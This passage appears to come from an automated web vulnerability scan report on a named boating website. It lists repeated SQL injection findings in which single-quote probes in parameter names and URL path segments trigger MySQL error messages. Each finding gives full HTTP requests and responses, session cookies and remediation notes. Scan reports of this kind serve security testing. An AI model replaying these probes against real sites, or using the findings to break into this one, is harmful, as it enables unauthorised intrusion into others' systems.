<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /calendar?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.151. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /career-opportunities?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /career-opportunities?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.152. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.153. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/bay-tripper?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/bay-tripper?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.154. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/books?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/books?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.155. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/new-england-fishing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/new-england-fishing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.156. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/under-way?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/under-way?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.157. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.158. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
